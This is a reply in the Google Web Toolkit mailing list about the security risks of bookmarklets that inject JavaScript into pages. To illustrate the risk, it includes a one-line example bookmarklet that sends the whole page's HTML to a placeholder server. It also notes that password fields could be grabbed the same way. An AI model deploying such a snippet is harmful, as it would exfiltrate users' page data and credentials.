On 13 June, 02:45, Sky <[email protected]> wrote:
> Oh, also, I'm SUPER wary of actually running that bookmarklet because
> of the fact it is injecting javascript directly into whatever page I
> am viewing. This compromises all security if you ever put malicious
> code in your app. Not only is there the issue of you being able to
> know what sites I visit and bookmark, but you have the power to get my
> passwords and credit card numbers if you wanted to and if I clicked on
> your bookmarklet on a page that I enter such information.

That's a global issue with bookmarklets, not only if they inject some
script. E.g.
javascript:var xhr=new XMLHttpRequest;xhr.open('POST','http://myserver/foo');xhr.send(document.documentElement.innerHTML);

With a bit more work, I could easily grab all password fields and send
their values to any server.

> So I don't know how many users are going to be willing to trust your
> app. I don't think I will unless myself or another third party goes
> through your code to be sure you aren't trying to get data from input
> fields.

The issue with bookmarklets injecting scripts is that they can
"become evil" without your bookmarklet code changing (this is also an
advantage, as the bookmarklet somehow "updates" itself just as any web
app).

-- 
You received this message because you are subscribed to the Google Groups 
"Google Web Toolkit" group.
To post to this group, send email to [email protected].
To unsubscribe from this group, send email to 
[email protected].
For more options, visit this group at 
http://groups.google.com/group/google-web-toolkit?hl=en.